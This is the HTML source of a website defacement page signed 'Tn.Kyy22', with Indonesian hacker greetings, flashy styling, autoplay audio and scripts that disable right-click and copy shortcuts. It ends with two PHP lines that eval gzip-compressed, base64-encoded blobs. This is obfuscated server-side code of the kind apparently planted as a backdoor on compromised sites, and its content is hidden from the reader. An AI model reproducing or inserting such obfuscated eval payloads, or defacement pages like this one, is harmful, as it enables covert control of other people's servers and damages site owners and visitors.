<head>
    </html>
  <title>Hacked by Tn.Kyy22</title>
  <meta charset="UTF-8">
  <meta name="description" content="Tersentuh Oleh +62 Smart People">
  <meta name="keywords" content="Hacked">
  <meta name="author" content="Tn.Kyy22"
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link href="https://fonts.googleapis.com/css?family=Fredericka+the+Great|Kaushan+Script|Press+Start+2P|Rationale" rel="stylesheet">
<link href="https://fonts.googleapis.com/css?family=Dokdo|Gloria+Hallelujah|Indie+Flower|Permanent+Marker" rel="stylesheet">
<title>Hacked by Tn.Kyy22</title>
<link rel="icon" type="_image/png" href="https://data.whicdn.com/images/307874935/large.jpg">
</style>
</head>
<center>
<style>
body{
   background:#000000;;
}
body {
color: #27D305;
font-family: Rockwell, Arial, Helvetica, sans-serif;
font-size: 12px;
margin: 0px;
}
a:link, a:visited {
color:#088A08;
text-decoration:none;
}
a:hover {
color:#088A08;
text-decoration:underline;
}
a img {
border-width:0;
}
.style1{font-size:50px;font-weight:bold;color:gold;}h2{z-index:1;top:10%;font-family:Orbitron;width:auto;text-align:center;text-shadow:0 0 3px purple;transition:1000ms linear 0s;-webkit-transition:1000ms linear 0s;-webkit-animation:blink 3s infinite;animation:blink 3s infinite;-webkit-animation-timing-function:linear;animation-timing-function:linear;}h2:hover,h2:focus{color:gold;text-shadow:0 0 20px #0F0;}h2:first-line{font-size:150%;}h3{z-index:1;font-family:Orbitron;width:auto;text-shadow:0 0 3px #0F0;transition:1000ms linear 0s;-webkit-transition:1000ms linear 0s;-webkit-animation:blink 3s infinite;animation:blink 3s infinite;-webkit-animation-timing-function:linear;animation-timing-function:linear;}h3:hover,h3:focus{color:yellow;text-shadow:0 0 30px #0F0;}h3:first-line{font-size:75%;}
@-webkit-keyframes blink {
0% {text-shadow: 0 0 1px #0F0;}
5%{text-shadow: 0 0 5px #0F0;}
10%{text-shadow: 0 0 10px #0F0;}
15%{text-shadow: 0 0 11px #0F0;}
20%{text-shadow: 0 0 12px #0F0;}
25%{text-shadow: 0 0 13px #0F0;}
30%{text-shadow: 0 0 14px #0F0;}
35%{text-shadow: 0 0 15px #0F0;}
40%{text-shadow: 0 0 16px #0F0;}
45%{text-shadow: 0 0 17px #0F0;}
50% {text-shadow: 0 0 18px #0F0;}
60% {text-shadow: 0 0 17x #0F0;}
70% {text-shadow: 0 0 16x #0F0;}
80% {text-shadow: 0 0 13 #0F0;}
90% {text-shadow: 0 0 10px #0F0;}
100% {text-shadow: 0 0 1px #0F0;}
}@keyframes blink {
0% {text-shadow: 0 0 1px #0F0;}
5%{text-shadow: 0 0 5px #0F0;}
10%{text-shadow: 0 0 10px #0F0;}
15%{text-shadow: 0 0 11px #0F0;}
20%{text-shadow: 0 0 12px #0F0;}
25%{text-shadow: 0 0 13px #0F0;}
30%{text-shadow: 0 0 14px #0F0;}
35%{text-shadow: 0 0 15px #0F0;}
40%{text-shadow: 0 0 16px #0F0;}
45%{text-shadow: 0 0 17px #0F0;}
50% {text-shadow: 0 0 18px #0F0;}
60% {text-shadow: 0 0 17x #0F0;}
70% {text-shadow: 0 0 16x #0F0;}
80% {text-shadow: 0 0 13 #0F0;}
90% {text-shadow: 0 0 10px #0F0;}
100% {text-shadow: 0 0 1px #0F0;}
}
@keyframes tremer {
0% {transform: rotate(3deg);}
50% {transform: rotate(-3deg);}
100% {transform: rotate(3deg);}
}
@-o-keyframes tremer {
0% {-o-transform: rotate(3deg);}
50% {-o-transform: rotate(-3deg);}
100% {-o-transform: rotate(3deg);}
}
@-moz-keyframes tremer {
0% {-moz-transform: rotate(3deg);}
50% {-moz-transform: rotate(-3deg);}
100% {-moz-transform: rotate(3deg);}
}

#mg img:hover {
-webkit-animation:tremer 0.5s linear infinite;
-moz-animation:tremer 0.5s linear infinite;
-o-animation:tremer 0.5s linear infinite;
animation:tremer 0.5s linear infinite;
}
.neon{<!--coleur lootz-->
color:blue;
text-shadow: 0 0 5px red,0 0 10px red, 0 0 30px orange, 0 0 45px yellow, 0 0 60px red;
}
.like{border:4px double yellow;
box-shadow:0px 2px 20px white;
border-radius:10px;
padding:9px;
height:310px;}
#mg img{border:4px double green;

border-radius:10px;
opacity:0.75;
-moz-opacity: 0.75;
filter: alpha(opacity=75);
}
/* Gradient 1 */
                  .ta10 {
                     background-color: rgba(223,223,223,0.25);
                     background-repeat:no-repeat;
                     background-size: 52% 100%;
                     background-position: center;
                     border:2px double blue;
                     padding:3px;
                     margin-right:4px;
                     margin-bottom:8px;
                     font-family: Lucida Console,Tahoma;
                            font-size:12px;
                     box-shadow: 0 0 5px red;
                     -webkit-box-shadow: 0 0 5px white;
                     -moz-box-shadow: 0 0 5px white;
                     border: solid 0px transparent; // or border: none;
                  }
</style>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
</head>
<center>
</div></p></center>
<div>
<img src="https://i.ibb.co/J2VByz3/IMG-20190706-114813.jpg" width="300" height="250"><br><br>
<center>
<style type="text/css"> body{ background:url(https://encrypted-tbn0.gstatic.com/images?q=tbn%3AANd9GcQOVy3qXOqVIUF2x8zEDRZj3-6XRKsm30LptN0EuwdtrHTMKt4N) repeat center center fixed black;
      }
img:hover {
opacity: 1.0;filter: alpha(opacity=100);
}
@keyframes rotate{
10% {transform:rotateY(36deg)}
20% {transform:rotateY(72deg)}
30% {transform:rotateY(108deg)}
40% {transform:rotateY(144deg)}
50% {transform:rotateY(180deg)}
60% {transform:rotateY(216deg)}
70% {transform:rotateY(252deg)}
80% {transform:rotateY(288deg)}
90% {transform:rotateY(324deg)}
100% {transform:rotateY(360deg)}
}
</style> </head> <body> <script> </*function check(e) { alert(e.keyCode); }*/ document.onkeydown = function() { if (e.ctrlKey && (e.keyCode === 67 || e.keyCode === 86 || e.keyCode === 85 || e.keyCode === 117)) {//Alt+c, Alt+v will also be disabled sadly. alert('KONTOL.!'); } return false; }; </script> <script type='text/javascript'> var isCtrl = false; document.onkeyup=function(e) { if(e.which == 17) isCtrl=false; } document.onkeydown=function(e) { if(e.which == 17) isCtrl=true; if((e.which == 85) || (e.which == 67) &amp;&amp; isCtrl == true) { // alert(&#8216;Keyboard shortcuts are cool!&#8217;); return false; } } var isNS = (navigator.appName == "Netscape") ? 1 : 0; if(navigator.appName == "Netscape") document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP); function mischandler(){ return false; } function mousehandler(e){ var myevent = (isNS) ? e : event; var eventbutton = (isNS) ? myevent.which : myevent.button; if((eventbutton==2)||(eventbutton==3)) return false; } document.oncontextmenu = mischandler; document.onmousedown = mousehandler; document.onmouseup = mousehandler; </script> <center> <SCRIPT> farbbibliothek = new Array(); farbbibliothek[0] = new Array("#FF0000","#FF1100","#FF2200","#FF3300","#FF4400","#FF5500","#FF6600","#FF7700","#FF8800","#FF9900","#FFaa00","#FFbb00","#FFcc00","#FFdd00","#FFee00","#FFff00","#FFee00","#FFdd00","#FFcc00","#FFbb00","#FFaa00","#FF9900","#FF8800","#FF7700","#FF6600","#FF5500","#FF4400","#FF3300","#FF2200","#FF1100"); farbbibliothek[1] = new Array("#00FF00","#000000","#00FF00","#00FF00"); farbbibliothek[2] = new Array("#00FF00","#FF0000","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00"); farbbibliothek[3] = new Array("#FF0000","#FF4000","#FF8000","#FFC000","#FFFF00","#C0FF00","#80FF00","#40FF00","#00FF00","#00FF40","#00FF80","#00FFC0","#00FFFF","#00C0FF","#0080FF","#0040FF","#0000FF","#4000FF","#8000FF","#C000FF","#FF00FF","#FF00C0","#FF0080","#FF0040"); farbbibliothek[4] = new Array("#FF0000","#EE0000","#DD0000","#CC0000","#BB0000","#AA0000","#990000","#880000","#770000","#660000","#550000","#440000","#330000","#220000","#110000","#000000","#110000","#220000","#330000","#440000","#550000","#660000","#770000","#880000","#990000","#AA0000","#BB0000","#CC0000","#DD0000","#EE0000"); farbbibliothek[5] = new Array("#000000","#000000","#000000","#FFFFFF","#FFFFFF","#FFFFFF"); farbbibliothek[6] = new Array("#33CCFF","#33CCCC","#33CC99","#33CC66","#33CC33","#33CC00"); farbbibliothek[7] = new Array("#00dbdb","#00afdb","#0083db","#0058db","#002cdb","#2c00db","#5800db","#8300db","#af00db","#db00db"); farbbibliothek[8] = new Array("#ffd8f4","#ffcff2","#ffc6f0","#ffbded","#ffb4eb","#ffabe8","#ffa2e6","#ff99e3","#ff90e1","#ff87de","#ff7edc","#ff75d9","#ff6cd7","#ff63d5","#ff5ad3","#ff51d1","#ff48cf","#ff3fcd","#ff36cb","#ff2dc9","#ff24c7","#ff1bc5","#ff12c3","#ff09c1","#f600b8","#ed00b1","#e400aa","#db00a3","#d2009c","#c90095","#c0008e","#b70087","#ae0080","#a50079","#9c0072","#93006b","#8a0064","#81005d","#780056","#6f004f","#660048","#5d0042","#54003b","#4b0035","#42002f","#390028","#300022","#27001b"); farben = farbbibliothek[4]; function farbschrift() { for(var i=0 ; i<Buchstabe.length; i++) { document.all["a"+i].style.color=farben[i]; } farbverlauf(); } function string2array(text) { Buchstabe = new Array(); while(farben.length<text.length) { farben = farben.concat(farben); } k=0; while(k<=text.length) { Buchstabe[k] = text.charAt(k); k++; } } function divserzeugen() { for(var i=0 ; i<Buchstabe.length; i++) { document.write("<font face='monotype corsiva' size=30><span id='a"+i+"' class='a"+i+"'>"+Buchstabe[i] + "</span></font>"); } farbschrift(); } var a=1; function farbverlauf() { for(var i=0 ; i<farben.length; i++) { farben[i-1]=farben[i]; } farben[farben.length-1]=farben[-1]; setTimeout("farbschrift()",30); } var farbsatz=1; function farbtauscher() { farben = farbbibliothek[farbsatz]; while(farben.length<text.length) { farben = farben.concat(farben); } farbsatz=Math.floor(Math.random()*(farbbibliothek.length-0.0001)); } setInterval("farbtauscher()",5000); text= "~[]-Panjang Umur Tn.Kyy22-[]~"; </script><span class='newclass'> <script type="text/javascript"> string2array(text); divserzeugen(); </script></span> <script type="text/javascript"><!-- var message="Sorry, right-click has been disabled";function clickIE(){if(document.all){(message);return false;}} function clickNS(e){if(document.layers||(document.getElementById&&!document.all)){if(e.which==2||e.which==3){(message);return false;}}} if(document.layers) {document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;} else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;} document.oncontextmenu=new Function("return false") </script> </center>
<script></script>
<font size ="5" color="grey">"Selamat Ulang Tahun Brader"<br>Panjang Umur dan Sehat Selalu Jangan Putus Asa Brader  Seni Peretas Kita Lebih Menyenangkan Dari Yang Kau Bayangkan<font>
<br>
<font size ="4" color="White">"Peretas Itu Diakui Bukan Mengakui"
<br>
<span class="blinking"><font face="Shadows Into Light Two" font="" size="6">"See You Next Time Brader"</font></span> 
       <style type="text/css">BODY{cursor:none}</style>
      </div> <font face="Shadows Into Light Two"> 
       <center> 
        <style type="text/css">BODY{cursor:none}</style> 
        <style type="text/css"> .blinking{ animation:blinkingText 0.8s infinite; } @keyframes blinkingText{ 0%{ color: #ff0027; } 20%{ color: #0c00ff; } 40%{ color: white; } 	60%{ color: #00e800; } 	80%{ color: red; } 100%{ color: #d0ff00; } } </style>
<font color="Lime">Walau Saya Ini Sedikit Pecundang Mengucapkan Melalui Sebuah Script</font>
<br>
<font size="4" family="Share Tech Mono" color="White">Semoga Menjadi Anak<font color="Red"> Yg Berguna Bagi Bangsa dan Negara</font>
</font>
<br>
<font size="15"><font color="black"><font face="Kaushan Script"><u><font color='#FF0059'><font size="">S</font><font color='#FF0007'>p</font><font color='#FF4900'>e</font><font color='#FF8C00'>c</font><font color='#FED200'>i</font><font color='#D6FF00'>a</font><font color='#87FE00'>l</font><font color='#36FF00'> </font><font color='#00FF2C'>T</font><font color='#00FF7F'>h</font><font color='#00FFCC'>a</font><font color='#00DBFF'>n</font><font color='#0093FF'>k</font><font color='#0051FE'>s</font><font color='#0002FF'> </font><font color='#5000FF'>T</font><font color='#9E00FF'>o</font></u></font>
</font><br><marquee width="400"><font face="verdana" color="Lime" size="5">Tn.Kyy22 -<font color="white"> Tn.Rizz22</font></font> </font></marquee>
<br><br>
 <audio autoplay="autoplay" controls="controls" src="https://api.soundcloud.com/tracks/140340730/stream?client_id=a3e059563d7fd3372b49b37f00a00bcf" type="audio/mpeg"></audio> 
</center>
<?php eval(gzinflate(base64_decode('jY9La8JAEMfvgXyHYRE2lvgolFISBG1NwYN9xNiLyLJNVnfbbBJ2J6Df3k2lYm89Dczv/5iZqkoxKzCgdYtNi+yz3e2EUdWehjDuxzC9CAplm5IfmTCmNvaMfc8hhkoLViqtMOgsF4cWujbHM3F6en+3pI5LwQthAvpUVygqHGTHRkS+h+KAI4m6jCGX3LiEyTp7Hjx0lh62Xy2vNFclTIB+i7xFza2St+PpvtsO81pTpzuwhqP0vQkQidhEoxGBIfTYKkk/knRDz5O9zJYJ3f4hafK+TlYZW6cLunWP9RphecV4KQy6TrJTh994iBq4WbzBrCiMsBYi2ICrcZ6rtOVrlrDZfJ7+9BDYkhi6S4OrX0LfIyl/VApzSUK4rgyB/Cu0H58A'))); ?>
<?php eval(gzinflate(base64_decode('c0jOL6jUcFCJd/P0cQ2OVq9Qj41WL8ktiM9LzE1Vj9VBk4GIaloDAA=='))); ?></body>
